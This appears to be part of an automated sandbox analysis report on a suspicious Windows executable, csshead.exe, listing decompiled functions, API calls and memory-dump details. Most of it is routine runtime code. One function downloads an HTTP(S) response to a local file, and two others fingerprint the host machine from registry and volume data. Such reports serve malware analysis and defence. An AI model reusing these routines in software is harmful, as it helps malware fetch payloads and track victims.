___fls_getvalue@4.LIBCMT ref: 00423C62

Part of subcall function 00425D10: TlsGetValue.KERNEL32(?,?,00423C67,00000000), ref: 00425D1E

___fls_setvalue@8.LIBCMT ref: 00423C75

Part of subcall function 00425D64: RtlDecodePointer.NTDLL(?), ref: 00425D75

GetLastError.KERNEL32(00000000,?,00000000), ref: 00423C7E
RtlExitUserThread.NTDLL(00000000), ref: 00423C85
GetCurrentThreadId.KERNEL32 ref: 00423C8B
__getptd.LIBCMT ref: 00423CF4

Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB

Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(00436FF4,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10

CreateThread.KERNEL32(?,?,00423C51,00000000,?,?), ref: 00423D2B
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00423D35

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00423C51, Relevance: 7.5, APIs: 5, Instructions: 34
thread

C-Code - Quality: 83%

			E00423C51(void* __ebx, void* __edi, void* __fp0, long _a4, char _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
				struct _SECURITY_ATTRIBUTES* _v0;
				void* __esi;
				void* __ebp;
				void* _t23;
				void* _t29;
				DWORD* _t34;
				void* _t39;
				void* _t42;
				long _t45;
				void* _t55;
				struct _SECURITY_ATTRIBUTES* _t56;
				intOrPtr* _t58;
				void* _t59;

				_t67 = __fp0;
				_t55 = __edi;
				_t42 = __ebx;
				_push(_t58);
				L00425D30();
				_t23 = E00425D10(L00425D2A());
				if(_t23 != 0) {
					_t45 = _a4;
					 *((intOrPtr*)(_t23 + 0x54)) =  *((intOrPtr*)(_t45 + 0x54));
					 *((intOrPtr*)(_t23 + 0x58)) =  *((intOrPtr*)(_t45 + 0x58));
					_t52 =  *((intOrPtr*)(_t45 + 4));
					_push(_t45);
					 *((intOrPtr*)(_t23 + 4)) =  *((intOrPtr*)(_t45 + 4));
					L00425F05(__ebx, __edi, _t58, __eflags, __fp0);
				} else {
					_t58 = _a4;
					_t39 = L00425D64(L00425D2A(), _t58);
					_t65 = _t39;
					if(_t39 == 0) {
						ExitThread(GetLastError());
					}
					 *_t58 = GetCurrentThreadId();
				}
				L00423C10(_t42, _t55, _t58, _t65, _t67);
				asm("int3");
				_push(_t42);
				_push(_t55);
				_t56 = _v0;
				_t43 = 0;
				_t66 = _t56;
				if(_t56 != 0) {
					_push(_t58);
					L00425D30();
					_t59 = E0042A124(1, 0x214);
					__eflags = _t59;
					if(__eflags == 0) {
						L13:
						E00422804(_t59);
						__eflags = _t43;
						if(_t43 != 0) {
							L004251DE(_t43);
						}
						_t29 = 0;
						__eflags = 0;
					} else {
						_push( *((intOrPtr*)(L00425EEB(0, _t52, __eflags) + 0x6c)));
						_push(_t59);
						L00425DBE(0, _t56, _t59, __eflags, _t67);
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						 *((intOrPtr*)(_t59 + 0x58)) = _a12;
						_t34 = _a20;
						 *((intOrPtr*)(_t59 + 0x54)) = _t56;
						__eflags = _t34;
						if(_t34 == 0) {
							_t34 =  &_a8;
						}
						_t29 = CreateThread(_v0, _a4, E00423C51, _t59, _a16, _t34);
						__eflags = _t29;
						if(_t29 == 0) {
							_t43 = GetLastError();
							goto L13;
						}
					}
				} else {
					 *((intOrPtr*)(L004251B8(_t66))) = 0x16;
					L00425166();
					_t29 = 0;
				}
				return _t29;
			}

0x00423c51
0x00423c51
0x00423c51
0x00423c56
0x00423c57
0x00423c62
0x00423c69
0x00423c95
0x00423c9b
0x00423ca1
0x00423ca4
0x00423ca7
0x00423ca8
0x00423cab
0x00423c6b
0x00423c6b
0x00423c75
0x00423c7a
0x00423c7c
0x00423c85
0x00423c85
0x00423c91
0x00423c91
0x00423cb0
0x00423cb5
0x00423cbb
0x00423cbc
0x00423cbd
0x00423cc0
0x00423cc2
0x00423cc4
0x00423cda
0x00423cdb
0x00423cec
0x00423cf0
0x00423cf2
0x00423d3d
0x00423d3e
0x00423d44
0x00423d46
0x00423d49
0x00423d4e
0x00423d4f
0x00423d4f
0x00423cf4
0x00423cf9
0x00423cfc
0x00423cfd
0x00423d05
0x00423d09
0x00423d0c
0x00423d11
0x00423d14
0x00423d16
0x00423d18
0x00423d18
0x00423d2b
0x00423d31
0x00423d33
0x00423d3b
0x00000000
0x00423d3b
0x00423d33
0x00423cc6
0x00423ccb
0x00423cd1
0x00423cd6
0x00423cd6
0x00423d55

APIs

Part of subcall function 00425D30: TlsGetValue.KERNEL32(?,00425E89), ref: 00425D39
Part of subcall function 00425D30: DecodePointer.KERNEL32 ref: 00425D4B
Part of subcall function 00425D30: TlsSetValue.KERNEL32(00000000), ref: 00425D5A

___fls_getvalue@4.LIBCMT ref: 00423C62

Part of subcall function 00425D10: TlsGetValue.KERNEL32(?,?,00423C67,00000000), ref: 00425D1E

___fls_setvalue@8.LIBCMT ref: 00423C75

Part of subcall function 00425D64: DecodePointer.KERNEL32(?,?,?,00423C7A,00000000,?,00000000), ref: 00425D75

GetLastError.KERNEL32(00000000,?,00000000), ref: 00423C7E
ExitThread.KERNEL32 ref: 00423C85
GetCurrentThreadId.KERNEL32 ref: 00423C8B

Part of subcall function 00425F05: InterlockedDecrement.KERNEL32(?), ref: 00425FA3

Part of subcall function 00423C10: __getptd.LIBCMT ref: 00423C1C
Part of subcall function 00423C10: __XcptFilter.LIBCMT ref: 00423C3D

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0042B9C5, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 272

APIs

Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39

Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100

__isleadbyte_l.LIBCMT ref: 0042B7B9
_strlen.LIBCMT ref: 0042B8D3
__aulldvrm.INT64 ref: 0042BC12
_write_string.LIBCMT ref: 0042BD55
_write_string.LIBCMT ref: 0042BE26

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C

Part of subcall function 0042FF3F: __isleadbyte_l.LIBCMT ref: 0042FFA6
Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,?,00000000,00000000,?,?,?,?,00422655), ref: 0042FFD7
Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,00000001,00000000,00000000,?,?,?,?,00422655), ref: 00430045

Strings

g, xrefs: 0042BA8F
@, xrefs: 0042B6E8

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00403C28, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 184
file

C-Code - Quality: 98%

			E00403C28(intOrPtr __eax, void* __ecx, CHAR* __edx) {
				intOrPtr _v8;
				CHAR* _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed char _v68;
				signed int _v72;
				char _v201;
				char _v458;
				void _v1483;
				signed int _t88;
				intOrPtr _t93;
				void* _t94;
				intOrPtr _t162;
				intOrPtr _t165;
				void* _t175;
				void* _t180;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0;
				_t176 =  *0x40b7a4;
				if( *0x40b7a4 == 0) {
					E00403A04(_t176);
				}
				_t162 =  *0x40a1a4; // 0x401ec0
				_t88 = E00401110(_v8, _t162);
				asm("sbb eax, eax");
				_v68 =  ~(_t88 & 0xffffff00 | _t88 == _v8);
				_v56 = E00401110(_v8, E00403E98);
				if(_v56 != 0) {
					_v56 = _v56 + 2;
					_v60 = E00401110(_v56, 0x403e9c);
					_v32 = _v60 - _v56;
					E004012B8( &_v201, _v32, _v56);
					 *((char*)(_t175 + _v32 - 0xc5)) = 0;
					E00401308( &_v458, _v60);
				}
				_t93 =  *0x40a298; // 0x0
				_t94 = _t93 - 1;
				_t180 = _t94;
				if(_t180 < 0) {
					_v64 = 0;
				} else {
					if(_t180 == 0) {
						_v64 = 0;
					} else {
						if(_t94 == 1) {
							_v64 = 1;
						}
					}
				}
				_v20 = E00403864(0x40b7a4, _v64, 0, 0, 0);
				if(_v68 == 0) {
					_v72 = 0x50;
				} else {
					_v72 = 0x1bb;
				}
				_v24 = E0040161C(_v20, _v72,  &_v201, 0, 0, 3, 0, 0);
				if(_v68 == 0) {
					_v72 = 0x4400000;
				} else {
					_v72 = 0x4c03000;
				}
				_t165 =  *0x40a244; // 0x4020b8
				_v28 = E00401660(_v24,  &_v458, _t165, 0, _v72, 0, 0, 0);
				if(_v68 != 0) {
					_v32 = 4;
					E004016D8(_v28,  &_v72, 0x1f,  &_v32);
					_v72 = _v72 | 0x00000100;
					E0040170C(_v28,  &_v72, 0x1f, 4);
				}
				E004015E4(_v28, 0, 0, 0, 0);
				_v32 = 4;
				_v36 = 0;
				_v40 = 0;
				E004039CC(_v28,  &_v36, 0x20000013,  &_v40,  &_v32);
				if(_v36 != 0xc8) {
					L24:
					E0040151C(_v28);
					E0040151C(_v24);
					E0040151C(_v20);
					return _v16;
				} else {
					_v52 = CreateFileA(_v12, 0x40000000, 0, 0, 2, 0x80, 0);
					if(_v52 == 0xffffffff) {
						goto L24;
					} else {
						goto L21;
					}
					do {
						L21:
						_v44 = E004016A4(_v28, 0,  &_v32, 0);
						E004015B0(_v28, 0x401,  &_v1483,  &_v32);
						WriteFile(_v52,  &_v1483, _v32,  &_v48, 0);
					} while (_v32 != 0 || _v44 == 0);
					CloseHandle(_v52);
					_v16 = 0xffffffff;
					goto L24;
				}
			}

0x00403c31
0x00403c34
0x00403c39
0x00403c3c
0x00403c43
0x00403c45
0x00403c45
0x00403c4a
0x00403c53
0x00403c60
0x00403c62
0x00403c72
0x00403c79
0x00403c81
0x00403c91
0x00403c9a
0x00403ca9
0x00403cb1
0x00403cc2
0x00403cc2
0x00403cc7
0x00403ccc
0x00403ccc
0x00403ccf
0x00403cda
0x00403cd1
0x00403cd1
0x00403ce1
0x00403cd3
0x00403cd4
0x00403ce6
0x00403ce6
0x00403cd4
0x00403cd1
0x00403d01
0x00403d08
0x00403d13
0x00403d0a
0x00403d0a
0x00403d0a
0x00403d36
0x00403d3d
0x00403d48
0x00403d3f
0x00403d3f
0x00403d3f
0x00403d61
0x00403d6f
0x00403d76
0x00403d78
0x00403d8e
0x00403d93
0x00403da7
0x00403da7
0x00403db7
0x00403dbc
0x00403dc5
0x00403dca
0x00403de0
0x00403dec
0x00403e78
0x00403e7b
0x00403e83
0x00403e8b
0x00403e96
0x00403df2
0x00403e0e
0x00403e15
0x00000000
0x00000000
0x00000000
0x00000000
0x00403e17
0x00403e17
0x00403e26
0x00403e3b
0x00403e55
0x00403e5b
0x00403e6b
0x00403e71
0x00000000
0x00403e71

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00403E08
WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 00403E55
CloseHandle.KERNEL32(000000FF), ref: 00403E6B

Strings

P, xrefs: 00403D13

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00404BA0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 176
registry

C-Code - Quality: 100%

			E00404BA0(intOrPtr* __eax) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				long _v24;
				long _v28;
				signed int _v32;
				void* _v36;
				void* _v40;
				signed int _v41;
				char _v298;
				char* _t78;
				intOrPtr _t82;
				intOrPtr _t87;
				intOrPtr _t92;
				intOrPtr _t98;
				CHAR* _t109;

				_v8 = __eax;
				_v16 = 0;
				_v12 = 0x101;
				if(GetComputerNameA( &_v298,  &_v12) != 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
				}
				_t78 =  *0x40a25c; // 0x402174
				RegOpenKeyExA(0x80000002, _t78, 0, 0x20119,  &_v36);
				_v12 = 0x101;
				_t82 =  *0x40a0e4; // 0x401d14
				if(E004038B0(_v36, _t82, 0, 0,  &_v298,  &_v12) == 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
				}
				_v12 = 0x101;
				_t87 =  *0x40a0e8; // 0x401d20
				if(E004038B0(_v36, _t87, 0, 0,  &_v298,  &_v12) == 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
				}
				_v12 = 0x101;
				_t92 =  *0x40a0ec; // 0x401d2c
				if(E004038B0(_v36, _t92, 0, 0,  &_v298,  &_v12) == 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
				}
				_v12 = 4;
				_v20 = 0;
				_t98 =  *0x40a0f0; // 0x401d3c
				E004038B0(_v36, _t98, 0, 0,  &_v20,  &_v12);
				E00403890(_v36);
				_v12 = 0;
				_v28 = 0;
				_v24 = 0;
				_t109 =  *0x40a268; // 0x4021d0
				GetVolumeInformationA(_t109, 0, 0,  &_v28,  &_v12,  &_v24, 0, 0);
				_v32 = _v20 ^ _v28 ^ _v24;
				E00401164(_v32,  &_v298);
				E00401308(_v8,  &_v298);
				E00401164(_v16,  &_v298);
				E0040133C(_v8,  &_v298);
				_v40 = _v8;
				_v41 = 0;
				while( *_v40 != 0) {
					_v41 = _v41 ^ E0040118C( *_v40);
					_v40 = _v40 + 2;
				}
				E00401164(_v41,  &_v298);
				return E0040133C(_v8,  &(( &_v298)[6]));
			}

0x00404ba9
0x00404bae
0x00404bb1
0x00404bcb
0x00404be8
0x00404be8
0x00404bf6
0x00404c01
0x00404c07
0x00404c1d
0x00404c31
0x00404c4e
0x00404c4e
0x00404c51
0x00404c67
0x00404c7b
0x00404c98
0x00404c98
0x00404c9b
0x00404cb1
0x00404cc5
0x00404ce2
0x00404ce2
0x00404ce5
0x00404cee
0x00404cfd
0x00404d07
0x00404d12
0x00404d19
0x00404d1e
0x00404d23
0x00404d3a
0x00404d40
0x00404d4f
0x00404d5b
0x00404d69
0x00404d77
0x00404d87
0x00404d92
0x00404d95
0x00404dad
0x00404da6
0x00404da9
0x00404da9
0x00404dc0
0x00404dde

APIs

GetComputerNameA.KERNEL32(?,00000101), ref: 00404BC3
RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00404C01

Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC

Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D

GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00404D40

Strings

t!@, xrefs: 00404BF6

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00404B9B, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173
registry

C-Code - Quality: 100%

			E00404B9B(intOrPtr* __eax, void* __edx, intOrPtr _a122) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				long _v24;
				long _v28;
				signed int _v32;
				void* _v36;
				void* _v40;
				signed int _v41;
				char _v298;
				char* _t80;
				intOrPtr _t84;
				intOrPtr _t89;
				intOrPtr _t94;
				intOrPtr _t100;
				CHAR* _t111;

				_a122 = _a122 + __edx;
				 *__eax =  *__eax + __eax;
				_v8 = __eax;
				_v16 = 0;
				_v12 = 0x101;
				if(GetComputerNameA( &_v298,  &_v12) != 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
				}
				_t80 =  *0x40a25c; // 0x402174
				RegOpenKeyExA(0x80000002, _t80, 0, 0x20119,  &_v36);
				_v12 = 0x101;
				_t84 =  *0x40a0e4; // 0x401d14
				if(E004038B0(_v36, _t84, 0, 0,  &_v298,  &_v12) == 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
				}
				_v12 = 0x101;
				_t89 =  *0x40a0e8; // 0x401d20
				if(E004038B0(_v36, _t89, 0, 0,  &_v298,  &_v12) == 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
				}
				_v12 = 0x101;
				_t94 =  *0x40a0ec; // 0x401d2c
				if(E004038B0(_v36, _t94, 0, 0,  &_v298,  &_v12) == 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
				}
				_v12 = 4;
				_v20 = 0;
				_t100 =  *0x40a0f0; // 0x401d3c
				E004038B0(_v36, _t100, 0, 0,  &_v20,  &_v12);
				E00403890(_v36);
				_v12 = 0;
				_v28 = 0;
				_v24 = 0;
				_t111 =  *0x40a268; // 0x4021d0
				GetVolumeInformationA(_t111, 0, 0,  &_v28,  &_v12,  &_v24, 0, 0);
				_v32 = _v20 ^ _v28 ^ _v24;
				E00401164(_v32,  &_v298);
				E00401308(_v8,  &_v298);
				E00401164(_v16,  &_v298);
				E0040133C(_v8,  &_v298);
				_v40 = _v8;
				_v41 = 0;
				while( *_v40 != 0) {
					_v41 = _v41 ^ E0040118C( *_v40);
					_v40 = _v40 + 2;
				}
				E00401164(_v41,  &_v298);
				return E0040133C(_v8,  &(( &_v298)[6]));
			}

0x00404b9b
0x00404b9e
0x00404ba9
0x00404bae
0x00404bb1
0x00404bcb
0x00404be8
0x00404be8
0x00404bf6
0x00404c01
0x00404c07
0x00404c1d
0x00404c31
0x00404c4e
0x00404c4e
0x00404c51
0x00404c67
0x00404c7b
0x00404c98
0x00404c98
0x00404c9b
0x00404cb1
0x00404cc5
0x00404ce2
0x00404ce2
0x00404ce5
0x00404cee
0x00404cfd
0x00404d07
0x00404d12
0x00404d19
0x00404d1e
0x00404d23
0x00404d3a
0x00404d40
0x00404d4f
0x00404d5b
0x00404d69
0x00404d77
0x00404d87
0x00404d92
0x00404d95
0x00404dad
0x00404da6
0x00404da9
0x00404da9
0x00404dc0
0x00404dde

APIs

GetComputerNameA.KERNEL32(?,00000101), ref: 00404BC3
RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00404C01

Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC

Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D

GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00404D40

Strings

t!@, xrefs: 00404BF6

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00411A50, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112

APIs

CallWindowProcA.USER32(?,?,?,?,?), ref: 00411AD3
CallWindowProcA.USER32(?,?,00000082,?,?), ref: 00411AFD
SetWindowLongA.USER32(?,000000FC,?), ref: 00411B2A

Strings

$, xrefs: 00411A9A

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00420390, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112

APIs

CallWindowProcA.USER32(?,?,?,?,?), ref: 00420413
CallWindowProcA.USER32(?,?,00000082,?,?), ref: 0042043D
SetWindowLongA.USER32(?,000000FC,?), ref: 0042046A

Strings

$, xrefs: 004203DA

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00418A10, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103

APIs

DefFrameProcA.USER32(?,?,?,?,?), ref: 00418A9A
DefFrameProcA.USER32(?,?,00000082,?,?), ref: 00418AC4
SetWindowLongA.USER32(?,000000FC,?), ref: 00418AF1

Strings

$, xrefs: 00418A5A

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004117F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101

C-Code - Quality: 100%

			E004117F0(struct HWND__** _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				struct HWND__* _v36;
				void* _t36;
				intOrPtr _t40;
				long _t42;
				intOrPtr _t45;
				void* _t46;
				intOrPtr _t47;
				struct HWND__* _t50;
				struct HWND__* _t55;
				struct HWND__* _t60;
				void* _t61;
				intOrPtr _t62;
				struct HWND__** _t65;
				void* _t66;
				struct HWND__* _t67;

				_t65 = _a4;
				if(_t65 == 0) {
					L11:
					__eflags = 0;
					return 0;
				} else {
					_t55 =  *_t65;
					if(_t55 == 0) {
						goto L11;
					} else {
						_t50 = _t65[7];
						if(_t50 == 0) {
							goto L11;
						} else {
							_t47 = _a16;
							_t67 = _a8;
							_t62 = _a12;
							_v20 = 0;
							_v12 = 0;
							_v16 = 0;
							_a4 = 0;
							_v36 = _t55;
							_a8 = _t65[9];
							_t65[9] =  &_v36;
							_v8 = 0x24;
							_v4 = 1;
							_v32 = _t67;
							_v28 = _t62;
							_v24 = _t47;
							_t36 =  *((intOrPtr*)( *(_t50->i)))( *_t65, _t67, _t62, _t47,  &_a4, _t65[8], _t61, _t66, _t46);
							_t65[9] = _v16;
							if(_t36 != 0) {
								L10:
								return _v20;
							} else {
								if(_t67 == 0x82) {
									_v16 = GetWindowLongA( *_t65, 0xfffffffc);
									_t40 = L00411030(_t65, 0x82, _t62, _t47);
									_t60 = _t65[6];
									_v32 = _t40;
									__eflags = _t60 -  *0x4334dc; // 0x3ef9e
									if(__eflags != 0) {
										_t42 = GetWindowLongA( *_t65, 0xfffffffc);
										__eflags = _t42 - _v16;
										if(_t42 == _v16) {
											SetWindowLongA( *_t65, 0xfffffffc, _t65[6]);
										}
									}
									 *_t65 = 0;
									goto L10;
								} else {
									_t45 = L00411030(_t65, _t67, _t62, _t47);
									_v32 = _t45;
									return _t45;
								}
							}
						}
					}
				}
			}

0x004117f4
0x004117fc
0x00411902
0x00411902
0x00411908
0x00411802
0x00411802
0x00411806
0x00000000
0x0041180c
0x0041180c
0x00411811
0x00000000
0x00411817
0x00411818
0x0041181d
0x00411822
0x00411826
0x0041182a
0x0041182e
0x00411832
0x0041183a
0x00411848
0x00411852
0x00411855
0x0041185d
0x00411865
0x00411869
0x0041186d
0x00411877
0x0041187d
0x00411882
0x004118f4
0x004118ff
0x00411884
0x0041188a
0x004118ba
0x004118be
0x004118c3
0x004118c6
0x004118ca
0x004118d0
0x004118d7
0x004118d9
0x004118dd
0x004118e8
0x004118e8
0x004118dd
0x004118ee
0x00000000
0x0041188c
0x00411891
0x00411899
0x004118a1
0x004118a1
0x0041188a
0x00411882
0x00411811
0x00411806

APIs

GetWindowLongA.USER32(00000000,000000FC), ref: 004118AF

Part of subcall function 00411030: CallWindowProcA.USER32(?,?,?,?,?), ref: 00411046

GetWindowLongA.USER32(00000000,000000FC), ref: 004118D7
SetWindowLongA.USER32(?,000000FC,?), ref: 004118E8

Strings

$, xrefs: 00411855

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0042CD2B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\csshead.exe,00000104), ref: 0042CD57
_parse_cmdline.LIBCMT ref: 0042CD82

Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100

_parse_cmdline.LIBCMT ref: 0042CDC3

Strings

C:\Users\user\Desktop\csshead.exe, xrefs: 0042CD4A, 0042CD4F

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00420EC0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
string

C-Code - Quality: 70%

			E00420EC0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __ebp) {
				intOrPtr* _v4;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				long _v24;
				char _t17;
				long _t23;
				void* _t31;
				void* _t47;
				void* _t56;

				_t47 = __edi;
				_t31 = __ebx;
				_t17 =  *0x440024; // 0x44001c
				_v12 = _t17;
				_push(1);
				_push( &_v12);
				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x2c))))() == 0 ||  *((intOrPtr*)(_v20 - 8)) == 0) {
					L004020A0(_t31,  &_v20, _t47, "Untitled");
				} else {
					wsprintfA( &_v16, "%d",  *((intOrPtr*)(__ecx + 0x20)) + 1);
					E004024C0( &_v12, __ebp, lstrlenA( &_v8),  &_v8);
				}
				 *((intOrPtr*)( *((intOrPtr*)( *_v4 + 0x4c))))(_v20);
				_t23 = _v24;
				_t56 = _t23 - 0xc -  *0x440020; // 0x440010
				if(_t56 != 0) {
					_t23 = InterlockedDecrement(_t23 + 0xfffffff4);
					if(_t23 <= 0) {
						_push(_v24 + 0xfffffff4);
						return L004221B4();
					}
				}
				return _t23;
			}

0x00420ec0
0x00420ec0
0x00420ec3
0x00420ed0
0x00420ed4
0x00420eda
0x00420edf
0x00420f28
0x00420eeb
0x00420efa
0x00420f18
0x00420f18
0x00420f3b
0x00420f3d
0x00420f45
0x00420f4b
0x00420f51
0x00420f59
0x00420f61
0x00000000
0x00420f67
0x00420f59
0x00420f6d

APIs

wsprintfA.USER32 ref: 00420EFA
lstrlenA.KERNEL32(?), ref: 00420F08

Part of subcall function 004024C0: InterlockedDecrement.KERNEL32(00000001), ref: 0040252D

InterlockedDecrement.KERNEL32(?), ref: 00420F51

Strings

Untitled, xrefs: 00420F1F

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00403B50, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
library

C-Code - Quality: 58%

